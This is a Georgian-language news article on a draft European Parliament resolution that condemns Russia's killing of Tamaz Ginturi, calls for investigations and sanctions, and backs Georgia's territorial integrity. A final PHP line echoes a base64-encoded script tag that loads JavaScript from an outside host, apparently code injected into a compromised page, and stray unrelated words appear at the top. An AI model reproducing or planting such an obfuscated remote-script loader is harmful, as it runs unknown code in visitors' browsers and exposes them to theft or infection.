celsiusi
ავერსი შნაიდერი

ევროპარლამენტში რუსეთის საოკუპაციო ძალების მიერ თამაზ გინტურის მკვლელობასთან დაკავშირებით რეზოლუცია მომზადდა, რომლითაც გმობენ თამაზ გინტურის მკვლელობასა და ლევან დოთიაშვილის უკანონო გატაცებას.

რეზოლუცია შეიცავს მოწოდებას ამ და სხვა მკვლელობების საფუძვლიანი გამოძიებისკენ, ევროპარლამენტარები მოითხოვენ პასუხისმგებელ პირთა პასუხისგებაში მიცემას.

„ევროპარლამენტი იმეორებს თავის ურყევ მხარდაჭერას საქართველოს სუვერენიტეტისა და ტერიტორიული მთლიანობისადმი მის საერთაშორისოდ აღიარებულ საზღვრებში, კატეგორიულად გმობს რუსეთის მიერ აფხაზეთისა და ცხინვალის რეგიონების უკანონო ოკუპაციას და ამ რეგიონებში უკანონო „ბორდერიზაციის“ და „პასპორტიზაციის“ პროცესს, მოუწოდებს რუსეთს, სრულად განახორციელოს ევროკავშირის შუამავლობით 2008 წლის 12 აგვისტოს ცეცხლის შეწყვეტის შეთანხმება და უპირობოდ გაიყვანოს ყველა საოკუპაციო ძალა; მოუწოდებს ადეკვატური დაფინანსებისა და გაუმჯობესებული შესაძლებლობისკენ ევროკავშირის სადამკვირვებლო მისიისთვის“, – აღნიშნულია რეზოლუციის პროექტში.

ამასთან, ევროპარლამენტარები ითხოვენ საოკუპაციო რეჟიმის უკანონო პატიმრობაში მყოფი საქართველოს ყველა მოქალაქის გათავისუფლებას, ასევე, მოუწოდებენ ევროსაბჭოს, შექმნას ევროკავშირის სანქციების სია ოთხოზორია-ტატუნაშვილის სიის გათვალისწინებით და დააწესოს სანქციები საქართველოს სუვერენიტეტის, ტერიტორიული მთლიანობისა და ადამიანის უფლებების დარღვევაზე პასუხისმგებელ პირებზე.

რეზოლუციის ტექსტის მიხედვით, ევროპარლამენტარები „გმობენ რუსეთის მიერ საქართველოს სუვერენიტეტისა და ტერიტორიული მთლიანობის დარღვევას და საქართველოს საშინაო პოლიტიკაში ჩარევას, ხაზს უსვამენ, რომ ამან გავლენა არ უნდა მოახდინოს საქართველოს ევროატლანტიკურ ინტეგრაციაზე“.

ევროპარლამენტში რეზოლუციის პროექტს კენჭს დღეს უყრიან.

216
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");